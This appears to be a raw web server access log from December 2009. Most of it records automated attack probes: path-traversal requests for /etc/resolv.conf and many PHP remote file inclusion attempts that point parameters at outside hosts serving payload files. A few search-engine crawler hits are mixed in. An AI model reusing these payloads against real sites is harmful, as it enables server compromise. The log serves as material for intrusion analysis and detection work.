64.40.103.14 - - [16/Dec/2009:05:02:29 -0600] "GET /logs/announcements.php?phpraid_dir=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 305 "-""-"
64.40.103.14 - - [16/Dec/2009:05:02:29 -0600] "GET /logs/announcements.php?phpraid_dir=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 305 "-""-"
64.40.103.14 - - [16/Dec/2009:05:02:29 -0600] "GET /announcements.php?phpraid_dir=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 300 "-""-"
64.40.103.14 - - [16/Dec/2009:05:02:29 -0600] "GET /announcements.php?phpraid_dir=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 300 "-""-"
82.98.136.21 - - [16/Dec/2009:05:04:23 -0600] "GET /logs/access_log.1240272000%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
82.98.136.21 - - [16/Dec/2009:05:04:23 -0600] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
82.98.136.21 - - [16/Dec/2009:05:04:23 -0600] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:05:04:49 -0600] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:05:04:49 -0600] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:05:04:49 -0600] "GET /logs/access_log.1240272000%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:05:04:53 -0600] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:05:04:53 -0600] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:05:04:53 -0600] "GET /logs/access_log.1240272000%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
85.17.199.105 - - [16/Dec/2009:05:05:16 -0600] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
85.17.199.105 - - [16/Dec/2009:05:05:16 -0600] "GET /logs/access_log.1240272000%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
85.17.199.105 - - [16/Dec/2009:05:05:16 -0600] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
82.98.136.21 - - [16/Dec/2009:05:05:57 -0600] "GET /logs/access_log.1237075200//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
82.98.136.21 - - [16/Dec/2009:05:06:02 -0600] "GET /logs/access_log.1235779200//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
82.98.136.21 - - [16/Dec/2009:05:06:11 -0600] "GET /logs/access_log.1235347200//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
82.98.136.21 - - [16/Dec/2009:05:06:17 -0600] "GET /logs/access_log.1236211200//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:05:06:27 -0600] "GET /logs/access_log.1237075200//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:05:06:33 -0600] "GET /logs/access_log.1235779200//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
65.55.207.93 - - [16/Dec/2009:05:06:38 -0600] "GET /logs/access_log.1129334400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.98.139.21 - - [16/Dec/2009:05:06:42 -0600] "GET /logs/access_log.1237075200//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:05:06:46 -0600] "GET /logs/access_log.1235779200//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.47.61.97 - - [16/Dec/2009:05:08:42 -0600] "GET /logs/access_log.1253577600//skins/advanced/advanced1.php?pluginpath[0]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 339 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
61.47.61.97 - - [16/Dec/2009:05:08:42 -0600] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
61.47.61.97 - - [16/Dec/2009:05:08:42 -0600] "GET /logs/access_log.1253577600//skins/advanced/advanced1.php?pluginpath[0]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
61.47.61.97 - - [16/Dec/2009:05:08:45 -0600] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 317 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
61.47.61.97 - - [16/Dec/2009:05:08:45 -0600] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 312 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
61.47.61.97 - - [16/Dec/2009:05:08:51 -0600] "GET /logs/access_log.1248825600//skins/advanced/advanced1.php?pluginpath[0]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 339 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
61.47.61.97 - - [16/Dec/2009:05:08:51 -0600] "GET /logs/access_log.1248825600//skins/advanced/advanced1.php?pluginpath[0]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
61.47.61.97 - - [16/Dec/2009:05:08:51 -0600] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 317 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
61.47.61.97 - - [16/Dec/2009:05:08:56 -0600] "GET /logs/access_log.1253577600//skins/advanced/advanced1.php?pluginpath[0]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
61.47.61.97 - - [16/Dec/2009:05:08:56 -0600] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
61.47.61.97 - - [16/Dec/2009:05:08:56 -0600] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 317 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
61.47.61.97 - - [16/Dec/2009:05:08:56 -0600] "GET /logs/access_log.1248825600//skins/advanced/advanced1.php?pluginpath[0]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
82.98.136.21 - - [16/Dec/2009:05:09:03 -0600] "GET /logs/access_log.1240272000//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
85.17.199.105 - - [16/Dec/2009:05:10:02 -0600] "GET /logs/access_log.1237075200//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
85.17.199.105 - - [16/Dec/2009:05:10:03 -0600] "GET /logs/access_log.1236211200//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
65.55.207.74 - - [16/Dec/2009:05:15:09 -0600] "GET /logs/access_log.1172102400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.122.141.47 - - [16/Dec/2009:05:17:42 -0600] "GET /index.php?kobr=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
222.122.141.47 - - [16/Dec/2009:05:17:42 -0600] "GET /logs/index.php?kobr=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
222.122.141.47 - - [16/Dec/2009:05:17:42 -0600] "GET /logs/access_log.1254355200/index.php?kobr=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
222.122.141.47 - - [16/Dec/2009:05:17:44 -0600] "GET /index.php?kobr=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
222.122.141.47 - - [16/Dec/2009:05:17:44 -0600] "GET /logs/index.php?kobr=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
222.122.141.47 - - [16/Dec/2009:05:17:44 -0600] "GET /logs/access_log.1254355200/index.php?kobr=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
222.122.141.47 - - [16/Dec/2009:05:17:53 -0600] "GET /index.php?kobr=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
222.122.141.47 - - [16/Dec/2009:05:17:53 -0600] "GET /logs/index.php?kobr=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
222.122.141.47 - - [16/Dec/2009:05:17:53 -0600] "GET /logs/access_log.1254355200/index.php?kobr=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
61.47.61.97 - - [16/Dec/2009:05:17:57 -0600] "GET /logs/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
61.47.61.97 - - [16/Dec/2009:05:17:57 -0600] "GET /snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 318 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
61.47.61.97 - - [16/Dec/2009:05:17:57 -0600] "GET /logs/access_log.1240272000/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
65.55.51.69 - - [16/Dec/2009:05:17:57 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
117.74.98.18 - - [16/Dec/2009:05:18:18 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.191.133.141 - - [16/Dec/2009:05:18:19 -0600] "GET //modules/vWar_Account/includes/functions_common.php?vwar_root2=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
81.191.133.141 - - [16/Dec/2009:05:18:19 -0600] "GET /logs/access_log.1241913600//modules/vWar_Account/includes/functions_common.php?vwar_root2=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
81.191.133.141 - - [16/Dec/2009:05:18:19 -0600] "GET /logs//modules/vWar_Account/includes/functions_common.php?vwar_root2=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
117.74.98.18 - - [16/Dec/2009:05:18:25 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
117.74.98.18 - - [16/Dec/2009:05:18:25 -0600] "GET /logs/access_log.1228262400//modules/vwar/admin/admin.php?vwar_root=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
117.74.98.18 - - [16/Dec/2009:05:18:25 -0600] "GET /logs/access_log.1228348800//modules/vwar/admin/admin.php?vwar_root=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
117.74.98.18 - - [16/Dec/2009:05:18:25 -0600] "GET /logs/access_log.1228867200//modules/vwar/admin/admin.php?vwar_root=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
117.74.98.18 - - [16/Dec/2009:05:18:28 -0600] "GET /logs/access_log.1234137600//modules/vwar/admin/admin.php?vwar_root=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
117.74.98.18 - - [16/Dec/2009:05:18:37 -0600] "GET /logs/access_log.1232236800//modules/vwar/admin/admin.php?vwar_root=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
81.191.133.141 - - [16/Dec/2009:05:18:37 -0600] "GET /logs/access_log.1238284800//modules/vWar_Account/includes/functions_common.php?vwar_root2=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
117.74.98.18 - - [16/Dec/2009:05:18:50 -0600] "GET /logs/access_log.1229385600//modules/vwar/admin/admin.php?vwar_root=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
117.74.98.18 - - [16/Dec/2009:05:18:51 -0600] "GET /logs/access_log.1237075200//modules/vwar/admin/admin.php?vwar_root=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
117.74.98.18 - - [16/Dec/2009:05:18:53 -0600] "GET /logs/access_log.1229904000//modules/vwar/admin/admin.php?vwar_root=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.55.51.69 - - [16/Dec/2009:05:18:55 -0600] "GET /logs/access_log.1167696000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
117.74.98.18 - - [16/Dec/2009:05:18:56 -0600] "GET /logs/access_log.1228435200//modules/vwar/admin/admin.php?vwar_root=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
117.74.98.18 - - [16/Dec/2009:05:19:04 -0600] "GET /logs/access_log.1235347200//modules/vwar/admin/admin.php?vwar_root=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
117.74.98.18 - - [16/Dec/2009:05:19:05 -0600] "GET /logs/access_log.1233273600//modules/vwar/admin/admin.php?vwar_root=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
117.74.98.18 - - [16/Dec/2009:05:19:07 -0600] "GET /logs/access_log.1234915200//modules/vwar/admin/admin.php?vwar_root=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
117.74.98.18 - - [16/Dec/2009:05:19:18 -0600] "GET /logs/access_log.1231113600//modules/vwar/admin/admin.php?vwar_root=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.53.183.210 - - [16/Dec/2009:05:19:26 -0600] "GET /index.php?lg=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 292 "-""-"
74.53.183.210 - - [16/Dec/2009:05:19:26 -0600] "GET /logs/index.php?lg=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 297 "-""-"
74.53.183.210 - - [16/Dec/2009:05:19:26 -0600] "GET /index.php?lg=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 292 "-""-"
74.53.183.210 - - [16/Dec/2009:05:19:26 -0600] "GET /logs/index.php?lg=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 297 "-""-"
61.47.61.97 - - [16/Dec/2009:05:19:55 -0600] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
61.47.61.97 - - [16/Dec/2009:05:19:55 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
61.47.61.97 - - [16/Dec/2009:05:19:55 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 317 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
208.116.0.130 - - [16/Dec/2009:05:24:03 -0600] "GET /logs//includes/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.831"
208.116.0.130 - - [16/Dec/2009:05:24:03 -0600] "GET //includes/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.831"
81.191.133.141 - - [16/Dec/2009:05:30:00 -0600] "GET /logs/access_log.1241913600//modules/vWar_Account/includes/functions_common.php?vwar_root2=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
81.191.133.141 - - [16/Dec/2009:05:30:00 -0600] "GET /logs//modules/vWar_Account/includes/functions_common.php?vwar_root2=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
81.191.133.141 - - [16/Dec/2009:05:30:00 -0600] "GET //modules/vWar_Account/includes/functions_common.php?vwar_root2=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
65.55.207.69 - - [16/Dec/2009:05:41:08 -0600] "GET /logs/access_log.1156896000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.19.51.194 - - [16/Dec/2009:05:43:16 -0600] "GET /?spaw_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
67.19.51.194 - - [16/Dec/2009:05:43:16 -0600] "GET /logs/access_log.1242691200/?spaw_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.19.51.194 - - [16/Dec/2009:05:43:17 -0600] "GET /logs/?spaw_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 200 216791 "-""Mozilla/5.0"
195.22.14.131 - - [16/Dec/2009:05:43:17 -0600] "GET //lib/Loggix/Module/Calendar.php?pathToIndex=http://195.22.14.131/teste/gorum/lang/albania????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 314 "-""-"
195.22.14.131 - - [16/Dec/2009:05:43:17 -0600] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://195.22.14.131/teste/gorum/lang/albania????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 319 "-""-"
211.255.32.182 - - [16/Dec/2009:05:43:31 -0600] "GET /logs/access_log.1242691200/?spaw_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.255.32.182 - - [16/Dec/2009:05:43:31 -0600] "GET /?spaw_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
211.255.32.182 - - [16/Dec/2009:05:43:34 -0600] "GET /logs/?spaw_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 200 216791 "-""Mozilla/5.0"
65.55.106.229 - - [16/Dec/2009:05:46:38 -0600] "GET /logs/access_log.1146355200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.209 - - [16/Dec/2009:05:47:07 -0600] "GET /_vti_cnf/?D=A HTTP/1.1" 200 676 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.93.147.154 - - [16/Dec/2009:05:47:39 -0600] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:05:47:40 -0600] "GET /logs/access_log.1246752000//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:05:48:07 -0600] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 200 204707 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:05:48:26 -0600] "GET /logs/access_log.1243296000//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:05:48:57 -0600] "GET /logs/index1.php?show=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:05:48:57 -0600] "GET /logs/access_log.1254182400/index1.php?show=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:05:48:57 -0600] "GET /logs/access_log.1254700800/index1.php?show=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:05:48:57 -0600] "GET /index1.php?show=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:05:48:59 -0600] "GET /index1.php?show=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:05:48:59 -0600] "GET /logs/index1.php?show=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:05:48:59 -0600] "GET /logs/access_log.1254700800/index1.php?show=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:05:48:59 -0600] "GET /logs/access_log.1254182400/index1.php?show=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:05:49:02 -0600] "GET /logs/access_log.1251244800//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:05:49:03 -0600] "GET /logs/access_log.1250640000//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:05:49:03 -0600] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:05:49:14 -0600] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 200 216796 "-""Mozilla/5.0"
65.55.106.131 - - [16/Dec/2009:05:49:37 -0600] "GET /logs/access_log.1197849600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.75 - - [16/Dec/2009:05:50:09 -0600] "GET /logs/access_log.1149811200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.228.240.75 - - [16/Dec/2009:05:50:25 -0600] "GET //components/com_simpleboard/image_upload.php?sbp=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 327 "-""-"
207.228.240.75 - - [16/Dec/2009:05:50:26 -0600] "GET //components/com_simpleboard/image_upload.php?sbp=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 327 "-""-"
67.227.136.138 - - [16/Dec/2009:05:50:28 -0600] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:05:50:28 -0600] "GET /logs/access_log.1245801600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
